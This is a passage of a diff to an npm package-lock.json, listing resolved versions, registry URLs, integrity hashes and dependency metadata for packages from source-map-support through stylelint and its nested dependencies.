"https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.21.tgz", + "integrity": "sha512-uBHU3L3czsIyYXKX88fdrGovxdSCoTGDRZ6SYXtSRxLZUzHg5P/66Ht6uoUlHu9EZod+inXhKo3qQgwXUT/y1w==", + "dependencies": { + "buffer-from": "^1.0.0", + "source-map": "^0.6.0" + } + }, + "node_modules/source-map-url": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/source-map-url/-/source-map-url-0.4.1.tgz", + "integrity": "sha512-cPiFOTLUKvJFIg4SKVScy4ilPPW6rFgMgfuZJPNoDuMs3nC1HbMUycBoJw77xFIp6z1UJQJOfx6C9GMH80DiTw==", + "deprecated": "See https://github.com/lydell/source-map-url#deprecated", + "dev": true + }, + "node_modules/spark-md5": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/spark-md5/-/spark-md5-3.0.2.tgz", + "integrity": "sha512-wcFzz9cDfbuqe0FZzfi2or1sgyIrsDwmPwfZC4hiNidPdPINjeUwNfv5kldczoEAcjl9Y1L3SM7Uz2PUEQzxQw==" + }, + "node_modules/sparse-bitfield": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/sparse-bitfield/-/sparse-bitfield-3.0.3.tgz", + "integrity": "sha1-/0rm5oZWBWuks+eSqzM004JzyhE=", + "dependencies": { + "memory-pager": "^1.0.2" + } + }, + "node_modules/spdx-correct": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", + "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", + "dev": true, + "dependencies": { + "spdx-expression-parse": "^3.0.0", + "spdx-license-ids": "^3.0.0" + } + }, + "node_modules/spdx-exceptions": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.5.0.tgz", + "integrity": "sha512-PiU42r+xO4UbUS1buo3LPJkjlO7430Xn5SVAhdpzzsPHsjbYVflnnFdATgabnLude+Cqu25p6N+g2lw/PFsa4w==", + "dev": true + }, + "node_modules/spdx-expression-parse": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", + "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", + "dev": true, + "dependencies": { + "spdx-exceptions": "^2.1.0", + "spdx-license-ids": "^3.0.0" + } + }, + "node_modules/spdx-license-ids": { + "version": "3.0.20", + "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.20.tgz", + "integrity": "sha512-jg25NiDV/1fLtSgEgyvVyDunvaNHbuwF9lfNV17gSmPFAlYzdfNBlLtLzXTevwkPj7DhGbmN9VnmJIgLnhvaBw==", + "dev": true + }, + "node_modules/spdy": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/spdy/-/spdy-4.0.2.tgz", + "integrity": "sha512-r46gZQZQV+Kl9oItvl1JZZqJKGr+oEkB08A6BzkiR7593/7IbtuncXHd2YoYeTsG4157ZssMu9KYvUHLcjcDoA==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.0", + "handle-thing": "^2.0.0", + "http-deceiver": "^1.2.7", + "select-hose": "^2.0.0", + "spdy-transport": "^3.0.0" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/spdy-transport": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/spdy-transport/-/spdy-transport-3.0.0.tgz", + "integrity": "sha512-hsLVFE5SjA6TCisWeJXFKniGGOpBgMLmerfO2aCyCU5s7nJ/rpAepqmFifv/GCbSbueEeAJJnmSQ2rKC/g8Fcw==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.0", + "detect-node": "^2.0.4", + "hpack.js": "^2.1.6", + "obuf": "^1.1.2", + "readable-stream": "^3.0.6", + "wbuf": "^1.7.3" + } + }, + "node_modules/split": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz", + "integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==", + "dependencies": { + "through": "2" + }, + "engines": { + "node": "*" + } + }, + "node_modules/split-ca": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split-ca/-/split-ca-1.0.1.tgz", + "integrity": "sha1-bIOv82kvphJW4M0ZfgXp3hV2kaY=" + }, + "node_modules/split-string": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/split-string/-/split-string-3.1.0.tgz", + "integrity": "sha512-NzNVhJDYpwceVVii8/Hu6DKfD2G+NrQHlS/V/qgv763EYudVwEcMQNxd2lh+0VrUByXN/oJkl5grOhYWvQUYiw==", + "dev": true, + "dependencies": { + "extend-shallow": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/split2": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/split2/-/split2-4.1.0.tgz", + "integrity": "sha512-VBiJxFkxiXRlUIeyMQi8s4hgvKCSjtknJv/LVYbrgALPwf5zSKmEwV9Lst25AkvMDnvxODugjdl6KZgwKM1WYQ==", + "engines": { + "node": ">= 10.x" + } + }, + "node_modules/sprintf-js": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", + "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=" + }, + "node_modules/sprintf-kit": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/sprintf-kit/-/sprintf-kit-2.0.1.tgz", + "integrity": "sha512-2PNlcs3j5JflQKcg4wpdqpZ+AjhQJ2OZEo34NXDtlB0tIPG84xaaXhpA8XFacFiwjKA4m49UOYG83y3hbMn/gQ==", + "dependencies": { + "es5-ext": "^0.10.53" + } + }, + "node_modules/sshpk": { + "version": "1.17.0", + "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", + "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", + "dependencies": { + "asn1": "~0.2.3", + "assert-plus": "^1.0.0", + "bcrypt-pbkdf": "^1.0.0", + "dashdash": "^1.12.0", + "ecc-jsbn": "~0.1.1", + "getpass": "^0.1.1", + "jsbn": "~0.1.0", + "safer-buffer": "^2.0.2", + "tweetnacl": "~0.14.0" + }, + "bin": { + "sshpk-conv": "bin/sshpk-conv", + "sshpk-sign": "bin/sshpk-sign", + "sshpk-verify": "bin/sshpk-verify" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sshpk/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/stack-trace": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.9.tgz", + "integrity": "sha1-qPbq7KkGdMMz58Q5U/J1tFFRBpU=", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/stackframe": { + "version": "1.3.4", + "resolved": "https://registry.npmjs.org/stackframe/-/stackframe-1.3.4.tgz", + "integrity": "sha512-oeVtt7eWQS+Na6F//S4kJ2K2VbRlS9D43mAlMyVpVWovy9o+jfgH8O9agzANzaiLjclA0oYzUXEM4PurhSUChw==", + "dev": true, + "license": "MIT" + }, + "node_modules/standard-as-callback": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz", + "integrity": "sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==" + }, + "node_modules/static-extend": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/static-extend/-/static-extend-0.1.2.tgz", + "integrity": "sha512-72E9+uLc27Mt718pMHt9VMNiAL4LMsmDbBva8mxWUCkT07fSzEGMYUCk0XWY6lp0j6RBAG4cJ3mWuZv2OE3s0g==", + "dev": true, + "dependencies": { + "define-property": "^0.2.5", + "object-copy": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/static-extend/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/static-extend/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/statuses": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-1.5.0.tgz", + "integrity": "sha1-Fhx9rBd2Wf2YEfQ3cfqZOBR4Yow=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/stop-iteration-iterator": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/stop-iteration-iterator/-/stop-iteration-iterator-1.0.0.tgz", + "integrity": "sha512-iCGQj+0l0HOdZ2AEeBADlsRC+vsnDsZsbdSiH1yNSjcfKM7fdpCMfqAL/dwF5BLiw/XhRft/Wax6zQbhq2BcjQ==", + "dev": true, + "dependencies": { + "internal-slot": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/storybook": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/storybook/-/storybook-8.6.4.tgz", + "integrity": "sha512-XXh1Acvf1r3BQX0BDLQw6yhZ7yUGvYxIcKOBuMdetnX7iXtczipJTfw0uyFwk0ltkKEE9PpJvivYmARF3u64VQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core": "8.6.4" + }, + "bin": { + "getstorybook": "bin/index.cjs", + "sb": "bin/index.cjs", + "storybook": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "prettier": "^2 || ^3" + }, + "peerDependenciesMeta": { + "prettier": { + "optional": true + } + } + }, + "node_modules/stream-composer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/stream-composer/-/stream-composer-1.0.2.tgz", + "integrity": "sha512-bnBselmwfX5K10AH6L4c8+S5lgZMWI7ZYrz2rvYjCPB2DIMC4Ig8OpxGpNJSxRZ58oti7y1IcNvjBAz9vW5m4w==", + "dev": true, + "dependencies": { + "streamx": "^2.13.2" + } + }, + "node_modules/stream-events": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", + "integrity": "sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==", + "dependencies": { + "stubs": "^3.0.0" + } + }, + "node_modules/stream-shift": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz", + "integrity": "sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==" + }, + "node_modules/stream-transform": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/stream-transform/-/stream-transform-2.1.3.tgz", + "integrity": "sha512-9GHUiM5hMiCi6Y03jD2ARC1ettBXkQBoQAe7nJsPknnI0ow10aXjTnew8QtYQmLjzn974BnmWEAJgCY6ZP1DeQ==", + "dependencies": { + "mixme": "^0.5.1" + } + }, + "node_modules/streamifier": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/streamifier/-/streamifier-0.1.1.tgz", + "integrity": "sha1-l+mNj6TRBdYqJpHR3AfoINuN/E8=", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/streamsearch": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", + "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/streamx": { + "version": "2.22.0", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.0.tgz", + "integrity": "sha512-sLh1evHOzBy/iWRiR6d1zRcLao4gGZr3C1kzNz4fopCOKJb6xD9ub8Mpi9Mr1R6id5o43S+d93fI48UC5uM9aw==", + "license": "MIT", + "dependencies": { + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" + } + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/string_decoder/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/string-template": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/string-template/-/string-template-0.2.1.tgz", + "integrity": "sha512-Yptehjogou2xm4UJbxJ4CxgZx12HBfeystp0y3x7s4Dj32ltVVG1Gg8YhKjHZkHicuKpZX/ffilA8505VbUbpw==" + }, + "node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/string-width-cjs": { + "name": "string-width", + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/string.prototype.matchall": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.matchall/-/string.prototype.matchall-4.0.8.tgz", + "integrity": "sha512-6zOCOcJ+RJAQshcTvXPHoxoQGONa3e/Lqx90wUA+wEzX78sg5Bo+1tQo4N0pohS0erG9qtCqJDjNCQBjeWVxyg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "internal-slot": "^1.0.3", + "regexp.prototype.flags": "^1.4.3", + "side-channel": "^1.0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trim": { + "version": "1.2.9", + "resolved": "https://registry.npmjs.org/string.prototype.trim/-/string.prototype.trim-1.2.9.tgz", + "integrity": "sha512-klHuCNxiMZ8MlsOihJhJEBJAiMVqU3Z2nEXWfWnIqjN0gEFS9J9+IxKozWWtQGcgoa1WUZzLjKPTr4ZHNFTFxw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.0", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimend": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.trimend/-/string.prototype.trimend-1.0.8.tgz", + "integrity": "sha512-p73uL5VCHCO2BZZ6krwwQE3kCzM7NKmis8S//xEC6fQonchbum4eP6kR4DLEjQFO3Wnj3Fuo8NM0kOSjVdHjZQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimstart": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.trimstart/-/string.prototype.trimstart-1.0.8.tgz", + "integrity": "sha512-UXSH262CSZY1tfu3G3Secr6uGLCFVPMhIqHjlgCUtCCcgihYc/xKs9djMTMUOb2j1mVSeU8EU6NWc/iQKU6Gfg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-ansi-cjs": { + "name": "strip-ansi", + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-bom": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-3.0.0.tgz", + "integrity": "sha512-vavAMRXOgBVNF6nyEEmL3DBK19iRpDcoIwW+swQ+CbGiu7lju6t+JklA1MHweoWtadgt4ISVUsXLyDq34ddcwA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/strip-final-newline": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/strip-indent": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-4.0.0.tgz", + "integrity": "sha512-mnVSV2l+Zv6BLpSD/8V87CW/y9EmmbYzGCIavsnsI6/nwn26DwffM/yztm30Z/I2DY9wdS3vXVCMnHDgZaVNoA==", + "dev": true, + "license": "MIT", + "dependencies": { + "min-indent": "^1.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/strip-json-comments": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/stripe": { + "version": "17.7.0", + "resolved": "https://registry.npmjs.org/stripe/-/stripe-17.7.0.tgz", + "integrity": "sha512-aT2BU9KkizY9SATf14WhhYVv2uOapBWX0OFWF4xvcj1mPaNotlSc2CsxpS4DS46ZueSppmCF5BX1sNYBtwBvfw==", + "license": "MIT", + "dependencies": { + "@types/node": ">=8.1.0", + "qs": "^6.11.0" + }, + "engines": { + "node": ">=12.*" + } + }, + "node_modules/strnum": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-1.0.5.tgz", + "integrity": "sha512-J8bbNyKKXl5qYcR36TIO8W3mVGVHrmmxsd5PAItGkmyzwJvybiw2IVq5nqd0i4LSNSkB/sx9VHllbfFdr9k1JA==", + "optional": true, + "peer": true + }, + "node_modules/stubs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz", + "integrity": "sha1-6NK6H6nJBXAwPAMLaQD31fiavls=" + }, + "node_modules/style-loader": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/style-loader/-/style-loader-3.3.3.tgz", + "integrity": "sha512-53BiGLXAcll9maCYtZi2RCQZKa8NQQai5C4horqKyRmHj9H7QmcUyucrH+4KW/gBQbXM2AsB0axoEcFZPlfPcw==", + "dev": true, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/style-mod": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/style-mod/-/style-mod-4.1.0.tgz", + "integrity": "sha512-Ca5ib8HrFn+f+0n4N4ScTIA9iTOQ7MaGS1ylHcoVqW9J7w2w8PzN6g9gKmTYgGEBH8e120+RCmhpje6jC5uGWA==", + "dev": true + }, + "node_modules/stylehacks": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/stylehacks/-/stylehacks-6.0.0.tgz", + "integrity": "sha512-+UT589qhHPwz6mTlCLSt/vMNTJx8dopeJlZAlBMJPWA3ORqu6wmQY7FBXf+qD+FsqoBJODyqNxOUP3jdntFRdw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-selector-parser": "^6.0.4" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/stylelint": { + "version": "16.4.0", + "resolved": "https://registry.npmjs.org/stylelint/-/stylelint-16.4.0.tgz", + "integrity": "sha512-uSx7VMuXwLuYcNSIg+0/fFNv0WinsfLAqsVVy7h7p80clKOHiGE8pfY6UjqwylTHiJrRIahTl6a8FPxGezhWoA==", + "dev": true, + "peer": true, + "dependencies": { + "@csstools/css-parser-algorithms": "^2.6.1", + "@csstools/css-tokenizer": "^2.2.4", + "@csstools/media-query-list-parser": "^2.1.9", + "@csstools/selector-specificity": "^3.0.3", + "@dual-bundle/import-meta-resolve": "^4.0.0", + "balanced-match": "^2.0.0", + "colord": "^2.9.3", + "cosmiconfig": "^9.0.0", + "css-functions-list": "^3.2.2", + "css-tree": "^2.3.1", + "debug": "^4.3.4", + "fast-glob": "^3.3.2", + "fastest-levenshtein": "^1.0.16", + "file-entry-cache": "^8.0.0", + "global-modules": "^2.0.0", + "globby": "^11.1.0", + "globjoin": "^0.1.4", + "html-tags": "^3.3.1", + "ignore": "^5.3.1", + "imurmurhash": "^0.1.4", + "is-plain-object": "^5.0.0", + "known-css-properties": "^0.30.0", + "mathml-tag-names": "^2.1.3", + "meow": "^13.2.0", + "micromatch": "^4.0.5", + "normalize-path": "^3.0.0", + "picocolors": "^1.0.0", + "postcss": "^8.4.38", + "postcss-resolve-nested-selector": "^0.1.1", + "postcss-safe-parser": "^7.0.0", + "postcss-selector-parser": "^6.0.16", + "postcss-value-parser": "^4.2.0", + "resolve-from": "^5.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^7.1.0", + "supports-hyperlinks": "^3.0.0", + "svg-tags": "^1.0.0", + "table": "^6.8.2", + "write-file-atomic": "^5.0.1" + }, + "bin": { + "stylelint": "bin/stylelint.mjs" + }, + "engines": { + "node": ">=18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/stylelint" + } + }, + "node_modules/stylelint-config-recommended": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-recommended/-/stylelint-config-recommended-14.0.0.tgz", + "integrity": "sha512-jSkx290CglS8StmrLp2TxAppIajzIBZKYm3IxT89Kg6fGlxbPiTiyH9PS5YUuVAFwaJLl1ikiXX0QWjI0jmgZQ==", + "dev": true, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.0.0" + } + }, + "node_modules/stylelint-config-recommended-scss": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-recommended-scss/-/stylelint-config-recommended-scss-14.0.0.tgz", + "integrity": "sha512-HDvpoOAQ1RpF+sPbDOT2Q2/YrBDEJDnUymmVmZ7mMCeNiFSdhRdyGEimBkz06wsN+HaFwUh249gDR+I9JR7Onw==", + "dev": true, + "dependencies": { + "postcss-scss": "^4.0.9", + "stylelint-config-recommended": "^14.0.0", + "stylelint-scss": "^6.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "postcss": "^8.3.3", + "stylelint": "^16.0.2" + }, + "peerDependenciesMeta": { + "postcss": { + "optional": true + } + } + }, + "node_modules/stylelint-config-standard": { + "version": "36.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-standard/-/stylelint-config-standard-36.0.0.tgz", + "integrity": "sha512-3Kjyq4d62bYFp/Aq8PMKDwlgUyPU4nacXsjDLWJdNPRUgpuxALu1KnlAHIj36cdtxViVhXexZij65yM0uNIHug==", + "dev": true, + "dependencies": { + "stylelint-config-recommended": "^14.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.1.0" + } + }, + "node_modules/stylelint-config-standard-scss": { + "version": "13.1.0", + "resolved": "https://registry.npmjs.org/stylelint-config-standard-scss/-/stylelint-config-standard-scss-13.1.0.tgz", + "integrity": "sha512-Eo5w7/XvwGHWkeGLtdm2FZLOMYoZl1omP2/jgFCXyl2x5yNz7/8vv4Tj6slHvMSSUNTaGoam/GAZ0ZhukvalfA==", + "dev": true, + "dependencies": { + "stylelint-config-recommended-scss": "^14.0.0", + "stylelint-config-standard": "^36.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "postcss": "^8.3.3", + "stylelint": "^16.3.1" + }, + "peerDependenciesMeta": { + "postcss": { + "optional": true + } + } + }, + "node_modules/stylelint-scss": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/stylelint-scss/-/stylelint-scss-6.2.1.tgz", + "integrity": "sha512-ZoGLbVb1keZYRVGQlhB8G6sZOoNqw61whzzzGFWp05N12ErqLFfBv3JPrXiMLZaW98sBS7K/vUQhRnvUj4vwdw==", + "dev": true, + "dependencies": { + "known-css-properties": "^0.29.0", + "postcss-media-query-parser": "^0.2.3", + "postcss-resolve-nested-selector": "^0.1.1", + "postcss-selector-parser": "^6.0.15", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.0.2" + } + }, + "node_modules/stylelint-scss/node_modules/known-css-properties": { + "version": "0.29.0", + "resolved": "https://registry.npmjs.org/known-css-properties/-/known-css-properties-0.29.0.tgz", + "integrity": "sha512-Ne7wqW7/9Cz54PDt4I3tcV+hAyat8ypyOGzYRJQfdxnnjeWsTxt1cy8pjvvKeI5kfXuyvULyeeAvwvvtAX3ayQ==", + "dev": true + }, + "node_modules/stylelint/node_modules/@csstools/selector-specificity": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@csstools/selector-specificity/-/selector-specificity-3.0.3.tgz", + "integrity": "sha512-KEPNw4+WW5AVEIyzC80rTbWEUatTW2lXpN8+8ILC8PiPeWPjwUzrPZDIOZ2wwqDmeqOYTdSGyL3+vE5GC3FB3Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "peer": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss-selector-parser": "^6.0.13" + } + }, + "node_modules/stylelint/node_modules/ansi-regex": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", + "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", + "dev": true, + "peer": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": 